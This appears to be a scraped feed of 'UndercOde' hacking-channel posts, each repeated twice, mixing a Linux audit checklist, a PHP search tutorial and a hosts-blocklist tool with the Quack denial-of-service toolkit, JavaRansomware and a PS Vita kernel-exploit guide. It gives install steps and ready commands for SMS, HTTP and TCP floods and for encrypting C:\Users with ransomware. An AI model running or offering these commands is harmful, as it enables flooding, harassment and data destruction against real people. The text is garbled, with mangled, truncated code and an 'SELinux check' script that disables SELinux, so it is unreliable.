During the audit, it is necessary to check the configuration of the Linux firewall to prevent unauthorized access. To control traffic, rules should be created in iptables that will filter incoming, outgoing and forwarded packets taking into account the IP address and TCP / UDP port number.
# iptables -n -L -v --line-numbers
ICMP / broadcast requests
10) During the audit, you must verify that the systems are configured to ignore ping and broadcast requests. To do this, make sure that the following lines are added to the β/etc/sysctl.confβ file :
# ignore ICMP requests:
net.ipv4.icmp_echo_ignore_all = 1
# ignore broadcast requests:
net.ipv4.icmp_echo_ignore_broadcasts = 1
11) Checking installed updates
The latest updates must be installed on the systems:
# yum updates
# yum check-update
12) Checking CRON Jobs Automatically
The auditor should check who is allowed and forbidden to perform tasks in cron. Access to cron is controlled using the /etc/cron.allow and /etc/cron.deny files .
# echo ALL >> / etc / cron.deny
13) Checking SELINUX Forced Security
During the audit, it is important to check the status of SELinux . This mechanism must be enabled in the system.
There are three SELinux modes :
Enforcing: SELinux policy is enforced. SELinux denies access based on SELinux policy rules.
Permissive: SELinux policy is not forced. SELinux does not block access, but bans are logged as actions that would be banned if the policy were enforced.
Disabled: SELinux is disabled. Only discrete DAC rules are used.
During the audit, you can use the following script to check SELinux status or use the system-configselinux, getenforce, or sestatus commands:
ENABLED =
if [β $ ENABLED β== 1]; then
echo βSELinux is enabled, disable? (yes / no): β
read disable
if [$ disable ==β yes β]; then
echo βdisabling selinuxβ
setenforce 0
fi
fi
π¦ LBSA script for checking basic security options
LBSA (Linux Basic Security Audit script) is a basic security configuration audit script for Linux systems. The script should be run from the command line with root privileges , or ideally run on a schedule on a regular basis using the cron scheduler to systematically check configuration changes.
Β» The purpose of this script is an express audit of security settings and uploading a report with a description of possible parameters that can be changed to provide a higher degree of security. In the case, if there are no recommendations for any option, the script simply displays one line with working out the check, and the final decision is always up to the administrator. Before starting the test, the developers strongly recommend that you read the manual and study the recommended sections for more information.
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
The auditor should check who is allowed and forbidden to perform tasks in cron. Access to cron is controlled using the /etc/cron.allow and /etc/cron.deny files .
# echo ALL >> / etc / cron.deny
13) Checking SELINUX Forced Security
During the audit, it is important to check the status of SELinux . This mechanism must be enabled in the system.
There are three SELinux modes :
Enforcing: SELinux policy is enforced. SELinux denies access based on SELinux policy rules.
Permissive: SELinux policy is not forced. SELinux does not block access, but bans are logged as actions that would be banned if the policy were enforced.
Disabled: SELinux is disabled. Only discrete DAC rules are used.
During the audit, you can use the following script to check SELinux status or use the system-configselinux, getenforce, or sestatus commands:
ENABLED =
cat / selinux / enforceif [β $ ENABLED β== 1]; then
echo βSELinux is enabled, disable? (yes / no): β
read disable
if [$ disable ==β yes β]; then
echo βdisabling selinuxβ
setenforce 0
fi
fi
π¦ LBSA script for checking basic security options
LBSA (Linux Basic Security Audit script) is a basic security configuration audit script for Linux systems. The script should be run from the command line with root privileges , or ideally run on a schedule on a regular basis using the cron scheduler to systematically check configuration changes.
Β» The purpose of this script is an express audit of security settings and uploading a report with a description of possible parameters that can be changed to provide a higher degree of security. In the case, if there are no recommendations for any option, the script simply displays one line with working out the check, and the final decision is always up to the administrator. Before starting the test, the developers strongly recommend that you read the manual and study the recommended sections for more information.
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 sms attack tools :
>Quack Toolkit is a set of tools for performing a denial of service attacks. Quack Toolkit includes SMS attack tool, HTTP attack tool and many other attack tools.
fb.com/UndercOdeTestingCompany
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/entynetproject/quack
2) cd quack
3) chmod +x install.sh
4) ./install.sh
5) Quack Toolkit execution
quack -h
6) usage: quack [-h] [--target <IP:port/URL/phone>]
[--tool [SMS|NTP|TCP|UDP|SYN|POD|SLOWLORIS|MEMCACHED|HTTP|NJRAT]]
[--timeout <timeout>] [--threads <threads>] [-u]
7) optional arguments:
-h, --help show this help message and exit
--target <IP:port/URL/phone>
Target IP:port, URL or phone.
--tool [SMS|NTP|TCP|UDP|SYN|POD|SLOWLORIS|MEMCACHED|HTTP|NJRAT]
Attack tool.
--timeout <timeout> Timeout in secounds.
--threads <threads> Threads count.
-u, --update Update Quack Toolkit.
Quack Toolkit examples
Example of the SMS attack:
quack --tool SMS --target 15554443333 --time 10 --threads 10
Example of the HTTP attack:
quack --tool HTTP --target http://example.com/ --time 10 --threads 10
Example of the TCP attack:
quack --tool TCP --target 192.168.1.100:80 --time 10 --threads 10
Tested by UndercOde
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 sms attack tools :
>Quack Toolkit is a set of tools for performing a denial of service attacks. Quack Toolkit includes SMS attack tool, HTTP attack tool and many other attack tools.
fb.com/UndercOdeTestingCompany
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/entynetproject/quack
2) cd quack
3) chmod +x install.sh
4) ./install.sh
5) Quack Toolkit execution
quack -h
6) usage: quack [-h] [--target <IP:port/URL/phone>]
[--tool [SMS|NTP|TCP|UDP|SYN|POD|SLOWLORIS|MEMCACHED|HTTP|NJRAT]]
[--timeout <timeout>] [--threads <threads>] [-u]
7) optional arguments:
-h, --help show this help message and exit
--target <IP:port/URL/phone>
Target IP:port, URL or phone.
--tool [SMS|NTP|TCP|UDP|SYN|POD|SLOWLORIS|MEMCACHED|HTTP|NJRAT]
Attack tool.
--timeout <timeout> Timeout in secounds.
--threads <threads> Threads count.
-u, --update Update Quack Toolkit.
Quack Toolkit examples
Example of the SMS attack:
quack --tool SMS --target 15554443333 --time 10 --threads 10
Example of the HTTP attack:
quack --tool HTTP --target http://example.com/ --time 10 --threads 10
Example of the TCP attack:
quack --tool TCP --target 192.168.1.100:80 --time 10 --threads 10
Tested by UndercOde
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Build your own site search engine-Website tutorial by Underc0de :
pinterest.com/UndercOdeOfficial
π¦LETS START:
> Before you write a program, you must think of an idea. The following is my idea. Maybe anyone has a better idea, but note that this is just a method issue: iterate through all files? Read content? Search keywords, if they match, put them into an array.
> Before implementing these steps, I assume that your web pages are standard, that is, there are titles (<title> </ title>) and (<bod *> </ body>), if you are designing with dreamweaver or frontpage , Then unless you deliberately delete them, they all exist. Let's step by step to complete and improve this search engine in the project.
1) F1rst, design the search form
Create a search.htm in the root directory of the website, the content is as follows:
<html>
<head>
<title> Search form </ title>
<meta http-equiv = "Content-Type" content = "text / html; charset = gb2312 ">
</ head>
<body bgcolor =" # FFFFFF "text =" # 000000 ">
<form name =" form1 "method ="
<tr>
<td width = "36%">
<div align = "center">
<input type = "text" name = "keyword">
</ div>
</ td>
<td width = "64%">
<input type = "submit" name = "Submit" value = "Search">
</ td>
</ tr>
</ table>
</ form>
</ body>
</ html>
2) Second, the search program
is in the root directory Create a search.php file to process the data from the search.htm form. The content is as follows:
<? Php
// Get search keywords
$ keyword = trim ( $ _POST [ βkeywordβ ]);
// Check if it is empty
if ( $ keyword == ββ ) {
echo βThe keyword you are searching for cannot be emptyβ ;
exit; // End the program
}
?>
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Build your own site search engine-Website tutorial by Underc0de :
pinterest.com/UndercOdeOfficial
π¦LETS START:
> Before you write a program, you must think of an idea. The following is my idea. Maybe anyone has a better idea, but note that this is just a method issue: iterate through all files? Read content? Search keywords, if they match, put them into an array.
> Before implementing these steps, I assume that your web pages are standard, that is, there are titles (<title> </ title>) and (<bod *> </ body>), if you are designing with dreamweaver or frontpage , Then unless you deliberately delete them, they all exist. Let's step by step to complete and improve this search engine in the project.
1) F1rst, design the search form
Create a search.htm in the root directory of the website, the content is as follows:
<html>
<head>
<title> Search form </ title>
<meta http-equiv = "Content-Type" content = "text / html; charset = gb2312 ">
</ head>
<body bgcolor =" # FFFFFF "text =" # 000000 ">
<form name =" form1 "method ="
<tr>
<td width = "36%">
<div align = "center">
<input type = "text" name = "keyword">
</ div>
</ td>
<td width = "64%">
<input type = "submit" name = "Submit" value = "Search">
</ td>
</ tr>
</ table>
</ form>
</ body>
</ html>
2) Second, the search program
is in the root directory Create a search.php file to process the data from the search.htm form. The content is as follows:
<? Php
// Get search keywords
$ keyword = trim ( $ _POST [ βkeywordβ ]);
// Check if it is empty
if ( $ keyword == ββ ) {
echo βThe keyword you are searching for cannot be emptyβ ;
exit; // End the program
}
?>
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ part 2 - Build your own site search engine
This way, if the keyword entered by the visitor is empty, a prompt can be made. Here is iterating through all the files.
twitter.com/UndercOdeTC
1) We can iterate through all the files recursively, using the functions opendir, readdir, or PHP Directory classes. We now use the former.
<PHP?
// function to traverse all files
function listFiles ( $ dir ) {
$ handle = opendir ( $ dir );
the while ( false ! == ( $ File = readdir ( $ handle ))) {
IF ( $ file ! = "." && $ file ! = ".." ) {
// If it is a directory, continue searching
if ( is_dir ( "$ dir / $ file" )) {
listFiles ( "$ dir / $ file" );
}
else {
// Process it here
}
}
}
}
?>
2) In the red text place, we can read and process the searched file. The following is the content of the read file And check whether the content contains the keyword $ keyword, if it contains, the file address is assigned to an array.
<? php
// $ dir is the search directory, $ keyword is the search keyword, and $ array is the array to store
3) function listFiles ( $ dir , $ keyword , & $ array ) (
$ handle = opendir ( $ dir );
while ( false ! == ( $ file = readdir ( $ handle ))) {
if ( $ file!="."&&$file!=".."){
if(is_dir("$dir/$file")){
listFiles("$dir/$file",$keyword,$array);
}
else{
//@undercodeofficial
$data=fread(fopen("$dir/$file","r"),filesize("$dir/$file"));
if($file!=βsearch.phpβ){
if(Now combine this result with the program at the beginning, enter a keyword, and you will find that relevant results in your website are searched out. We are perfecting it now.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ part 2 - Build your own site search engine
This way, if the keyword entered by the visitor is empty, a prompt can be made. Here is iterating through all the files.
twitter.com/UndercOdeTC
1) We can iterate through all the files recursively, using the functions opendir, readdir, or PHP Directory classes. We now use the former.
<PHP?
// function to traverse all files
function listFiles ( $ dir ) {
$ handle = opendir ( $ dir );
the while ( false ! == ( $ File = readdir ( $ handle ))) {
IF ( $ file ! = "." && $ file ! = ".." ) {
// If it is a directory, continue searching
if ( is_dir ( "$ dir / $ file" )) {
listFiles ( "$ dir / $ file" );
}
else {
// Process it here
}
}
}
}
?>
2) In the red text place, we can read and process the searched file. The following is the content of the read file And check whether the content contains the keyword $ keyword, if it contains, the file address is assigned to an array.
<? php
// $ dir is the search directory, $ keyword is the search keyword, and $ array is the array to store
3) function listFiles ( $ dir , $ keyword , & $ array ) (
$ handle = opendir ( $ dir );
while ( false ! == ( $ file = readdir ( $ handle ))) {
if ( $ file!="."&&$file!=".."){
if(is_dir("$dir/$file")){
listFiles("$dir/$file",$keyword,$array);
}
else{
//@undercodeofficial
$data=fread(fopen("$dir/$file","r"),filesize("$dir/$file"));
if($file!=βsearch.phpβ){
if(Now combine this result with the program at the beginning, enter a keyword, and you will find that relevant results in your website are searched out. We are perfecting it now.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Automate process invoke extensions to block additional sites by category.
> Extending and consolidating hosts files from several well-curated sources like adaway .org, mvps. org, malwaredomainlist. com, someonewhocares. org, and potentially others. You can optionally
pinterest.com/UndercOdeOfficial
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/StevenBlack/hosts
2) cd hosts
3) pip3 install --user -r requirements.txt
4) python3 updateHostsFile.py [--auto] [--replace] [--ip nnn.nnn.nnn.nnn] [--extensions ext1 ext2 ext3]
π¦Commands :
>--help, or -h: display help.
--auto, or -a: run the script without prompting. When --auto is invoked,
Hosts data sources, including extensions, are updated.
No extensions are included by default. Use the --extensions or -e flag to include any you want.
Your active hosts file is not replaced unless you include the --replace flag.
--backup, or -b: Make a backup of existing hosts file(s) as you generate over them.
--extensions <ext1> <ext2> <ext3>, or -e <ext1> <ext2> <ext3>: the names of subfolders below the extensions folder containing additional category-specific hosts files to include in the amalgamation. Example: --extensions porn or -e social porn.
--flush-dns-cache, or -f: skip the prompt for flushing the DNS cache. Only active when --replace is also active.
--ip nnn.nnn.nnn.nnn, or -i nnn.nnn.nnn.nnn: the IP address to use as the target. Default is 0.0.0.0.
--keepdomaincomments, or -k: true (default) or false, keep the comments that appear on the same line as domains. The default is true.
--noupdate, or -n: skip fetching updates from hosts data sources.
--output <subfolder>, or -o <subfolder>: place the generated source file in a subfolder. If the subfolder does not exist, it will be created.
--replace, or -r: trigger replacing your active hosts
--skipstatichosts, or -s: false (default) or true, omit the standard section at the top, containing lines like 127.0.0.1 localhost. This is useful for configuring proximate DNS services on the local network.
--compress, or -c: false (default) or true, Compress the hosts file ignoring non-necessary lines (empty lines and comments) and putting multiple domains in each line. Reducing the number of lines of the hosts file improves the performances under Windows (with DNS Client service enabled).
--minimise, or -m: false (default) or true, like --compress, but puts each domain on a separate line. This is necessary because many implementations of URL blockers that rely on hosts files do not conform to the standard which allows multiple hosts on a single line.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Automate process invoke extensions to block additional sites by category.
> Extending and consolidating hosts files from several well-curated sources like adaway .org, mvps. org, malwaredomainlist. com, someonewhocares. org, and potentially others. You can optionally
pinterest.com/UndercOdeOfficial
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/StevenBlack/hosts
2) cd hosts
3) pip3 install --user -r requirements.txt
4) python3 updateHostsFile.py [--auto] [--replace] [--ip nnn.nnn.nnn.nnn] [--extensions ext1 ext2 ext3]
π¦Commands :
>--help, or -h: display help.
--auto, or -a: run the script without prompting. When --auto is invoked,
Hosts data sources, including extensions, are updated.
No extensions are included by default. Use the --extensions or -e flag to include any you want.
Your active hosts file is not replaced unless you include the --replace flag.
--backup, or -b: Make a backup of existing hosts file(s) as you generate over them.
--extensions <ext1> <ext2> <ext3>, or -e <ext1> <ext2> <ext3>: the names of subfolders below the extensions folder containing additional category-specific hosts files to include in the amalgamation. Example: --extensions porn or -e social porn.
--flush-dns-cache, or -f: skip the prompt for flushing the DNS cache. Only active when --replace is also active.
--ip nnn.nnn.nnn.nnn, or -i nnn.nnn.nnn.nnn: the IP address to use as the target. Default is 0.0.0.0.
--keepdomaincomments, or -k: true (default) or false, keep the comments that appear on the same line as domains. The default is true.
--noupdate, or -n: skip fetching updates from hosts data sources.
--output <subfolder>, or -o <subfolder>: place the generated source file in a subfolder. If the subfolder does not exist, it will be created.
--replace, or -r: trigger replacing your active hosts
--skipstatichosts, or -s: false (default) or true, omit the standard section at the top, containing lines like 127.0.0.1 localhost. This is useful for configuring proximate DNS services on the local network.
--compress, or -c: false (default) or true, Compress the hosts file ignoring non-necessary lines (empty lines and comments) and putting multiple domains in each line. Reducing the number of lines of the hosts file improves the performances under Windows (with DNS Client service enabled).
--minimise, or -m: false (default) or true, like --compress, but puts each domain on a separate line. This is necessary because many implementations of URL blockers that rely on hosts files do not conform to the standard which allows multiple hosts on a single line.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ JavaRansomware
Ransomware is malware for data kidnapping, an exploit in which the attacker encrypts the victim's dataRansomware stops you from using your PC.Ransomware spreads through e-mail attachments, infected programs and compromised websites. A ransomware malware program may also be called a cryptovirus, cryptotrojan or cryptoworm It holds your PC or files for "ransom".
T.me/UndercOdeTesting
π¦FEATURES :
Ransomware can:
1) Prevent you from accessing Windows.
2) Encrypt files so you can't use them.
3) Stop certain apps from running (like your web browser).
4) Ransomware will demand that you pay money (a βransomβ) to get access to your PC or files. We have also seen them make you complete surveys.
5) There is no guarantee that paying the fine or doing what the ransomware tells you will give access to your PC or files again.
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/PanagiotisDrakatos/JavaRansomware
2) $ cd JarPath
Encrypt All Files in the Current Path wait until the execution will be finished
3) $ java -jar JavaRansomware.jar C:\Users Encrypt
Decrypt All Files in the Current Path wait until the execution will be finished
4) $ java -jar JavaRansomware.jar C:\Users Decrypt
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ JavaRansomware
Ransomware is malware for data kidnapping, an exploit in which the attacker encrypts the victim's dataRansomware stops you from using your PC.Ransomware spreads through e-mail attachments, infected programs and compromised websites. A ransomware malware program may also be called a cryptovirus, cryptotrojan or cryptoworm It holds your PC or files for "ransom".
T.me/UndercOdeTesting
π¦FEATURES :
Ransomware can:
1) Prevent you from accessing Windows.
2) Encrypt files so you can't use them.
3) Stop certain apps from running (like your web browser).
4) Ransomware will demand that you pay money (a βransomβ) to get access to your PC or files. We have also seen them make you complete surveys.
5) There is no guarantee that paying the fine or doing what the ransomware tells you will give access to your PC or files again.
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/PanagiotisDrakatos/JavaRansomware
2) $ cd JarPath
Encrypt All Files in the Current Path wait until the execution will be finished
3) $ java -jar JavaRansomware.jar C:\Users Encrypt
Decrypt All Files in the Current Path wait until the execution will be finished
4) $ java -jar JavaRansomware.jar C:\Users Decrypt
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Updated Fully chained kernel exploit for the PS Vita on firmwares 3.65-3.68
Instagram.com/underCodeTestingCompany
π¦ Requirements
1) Your device must be on firmware 3.65, 3.67 or 3.68. Firmware 3.69 and higher are not supported. If you're on a lower firmware, please decide carefully to what firmware you want to update, then search for a trustable guide on /r/vitahacks.
2) If your device is a phat OLED model, you need a Memory Card in order to install. There's no need for a Memory Card on Slim/PS TV models, since they already provide an Internal Storage. Make sure you have got at least 270 MB of free space.
3) Your device must be linked to any PSN account (it doesn't need to be activated though). If it is not, then you must restore default settings in order to sign in.
π¦πβπππΈπππππΈπππβ & βπβ:
1) download https://github.com/TheOfficialFloW/h-encore/releases/download/v2.0/h-encore.zip
> extract
2) ownload and install qcma, psvimgtools and pkg2zip (check the releases section for the binaries).
If you don't know where to put psvimgtools and pkg2zip binaries, just put them in the h-encore folder.
>> https://codestation.github.io/qcma/
> https://github.com/yifanlu/psvimgtools
> https://github.com/mmozeiko/pkg2zip
3) Download the vulnerable DRM-free demo of bitter smile (yes, that's the user entry point).
> http://ares.dl.playstation.net/cdn/JP0741/PCSG90096_00/xGMrXOkORxWRyqzLMihZPqsXAbAXLzvAdJFqtPJLAZTgOcqJobxQAhLNbgiFydVlcmVOrpZKklOYxizQCRpiLfjeROuWivGXfwgkq.pkg
4) Extract the demo using this command in terminal/cmd:
pkg2zip -x PATH_OF_PKG
This will output the files to app/PCSG90096.
5) Copy the contents of the output app/PCSG90096 to the folder h-encore/app/ux0_temp_game_PCSG90096_app_PCSG90096 (such that the files eboot.bin and VITA_PATH.TXT are within the same folder).
6) Copy the license file app/PCSG90096/sce_sys/package/temp.bin to the folder
h-encore/license/ux0_temp_game_PCSG90096_license_app_PCSG90096 and rename the just pasted file temp.bin to 6488b73b912a753a492e2714e9b38bc7.rif. Be careful with the file extension, it should not be .rif.bin. Again, this file should be in the same folder as VITA_PATH.TXT.
7) Start qcma and within the qcma settings set the option Use this version for updates to FW 0.00 (Always up-to-date) to spoof the System Software check.
8) Launch Content Manager on your PS Vita and connect it to your computer, where you then need to select PC -> PS Vita System, and after that you select Applications. If you see an error message about System Software, you should simply reboot your device to solve it (if this doesn't solve, then put your device into airplane mode and reboot). If this does still not work, then alternatively set DNS to 212.47.229.76 to block updates. This should create a folder at PS Vita/APP/xxxxxxxxxxxxxxxx on your computer (see qcma settings where this folder is), where the folder xxxxxxxxxxxxxxxx represents the AID (account ID that is 16 characters long) that you need to insert here. If the AID is valid, it will yield a key that you can now use to encrypt the demo.
9) Change directory to the h-encore folder in terminal/cmd and use the key to encrypt all folders using (make sure you don't confuse the key with the AID, the key is 64 characters long!):
psvimg-create -n app -K YOUR_KEY app PCSG90096/app
psvimg-create -n appmeta -K YOUR_KEY appmeta PCSG90096/appmeta
psvimg-create -n license -K YOUR_KEY license PCSG90096/license
psvimg-create -n savedata -K YOUR_KEY savedata PCSG90096/savedata
10) The folder h-encore/PCSG90096 should then contain sce_sys and all 4 folders from above, and within these folders you should find files called X.psvimg and X.psvmd, where X has the same name as the folder. Backup this folder, since if everything has been done correctly, you don't need to redo all the steps to install it onto another device with the same PSN account.
11) Copy the folder h-encore/PCSG90096 to PS Vita/APP/xxxxxxxxxxxxxxxx/PCSG90096 and then select Refresh database in qcma.
π¦Updated Fully chained kernel exploit for the PS Vita on firmwares 3.65-3.68
Instagram.com/underCodeTestingCompany
π¦ Requirements
1) Your device must be on firmware 3.65, 3.67 or 3.68. Firmware 3.69 and higher are not supported. If you're on a lower firmware, please decide carefully to what firmware you want to update, then search for a trustable guide on /r/vitahacks.
2) If your device is a phat OLED model, you need a Memory Card in order to install. There's no need for a Memory Card on Slim/PS TV models, since they already provide an Internal Storage. Make sure you have got at least 270 MB of free space.
3) Your device must be linked to any PSN account (it doesn't need to be activated though). If it is not, then you must restore default settings in order to sign in.
π¦πβπππΈπππππΈπππβ & βπβ:
1) download https://github.com/TheOfficialFloW/h-encore/releases/download/v2.0/h-encore.zip
> extract
2) ownload and install qcma, psvimgtools and pkg2zip (check the releases section for the binaries).
If you don't know where to put psvimgtools and pkg2zip binaries, just put them in the h-encore folder.
>> https://codestation.github.io/qcma/
> https://github.com/yifanlu/psvimgtools
> https://github.com/mmozeiko/pkg2zip
3) Download the vulnerable DRM-free demo of bitter smile (yes, that's the user entry point).
> http://ares.dl.playstation.net/cdn/JP0741/PCSG90096_00/xGMrXOkORxWRyqzLMihZPqsXAbAXLzvAdJFqtPJLAZTgOcqJobxQAhLNbgiFydVlcmVOrpZKklOYxizQCRpiLfjeROuWivGXfwgkq.pkg
4) Extract the demo using this command in terminal/cmd:
pkg2zip -x PATH_OF_PKG
This will output the files to app/PCSG90096.
5) Copy the contents of the output app/PCSG90096 to the folder h-encore/app/ux0_temp_game_PCSG90096_app_PCSG90096 (such that the files eboot.bin and VITA_PATH.TXT are within the same folder).
6) Copy the license file app/PCSG90096/sce_sys/package/temp.bin to the folder
h-encore/license/ux0_temp_game_PCSG90096_license_app_PCSG90096 and rename the just pasted file temp.bin to 6488b73b912a753a492e2714e9b38bc7.rif. Be careful with the file extension, it should not be .rif.bin. Again, this file should be in the same folder as VITA_PATH.TXT.
7) Start qcma and within the qcma settings set the option Use this version for updates to FW 0.00 (Always up-to-date) to spoof the System Software check.
8) Launch Content Manager on your PS Vita and connect it to your computer, where you then need to select PC -> PS Vita System, and after that you select Applications. If you see an error message about System Software, you should simply reboot your device to solve it (if this doesn't solve, then put your device into airplane mode and reboot). If this does still not work, then alternatively set DNS to 212.47.229.76 to block updates. This should create a folder at PS Vita/APP/xxxxxxxxxxxxxxxx on your computer (see qcma settings where this folder is), where the folder xxxxxxxxxxxxxxxx represents the AID (account ID that is 16 characters long) that you need to insert here. If the AID is valid, it will yield a key that you can now use to encrypt the demo.
9) Change directory to the h-encore folder in terminal/cmd and use the key to encrypt all folders using (make sure you don't confuse the key with the AID, the key is 64 characters long!):
psvimg-create -n app -K YOUR_KEY app PCSG90096/app
psvimg-create -n appmeta -K YOUR_KEY appmeta PCSG90096/appmeta
psvimg-create -n license -K YOUR_KEY license PCSG90096/license
psvimg-create -n savedata -K YOUR_KEY savedata PCSG90096/savedata
10) The folder h-encore/PCSG90096 should then contain sce_sys and all 4 folders from above, and within these folders you should find files called X.psvimg and X.psvmd, where X has the same name as the folder. Backup this folder, since if everything has been done correctly, you don't need to redo all the steps to install it onto another device with the same PSN account.
11) Copy the folder h-encore/PCSG90096 to PS Vita/APP/xxxxxxxxxxxxxxxx/PCSG90096 and then select Refresh database in qcma.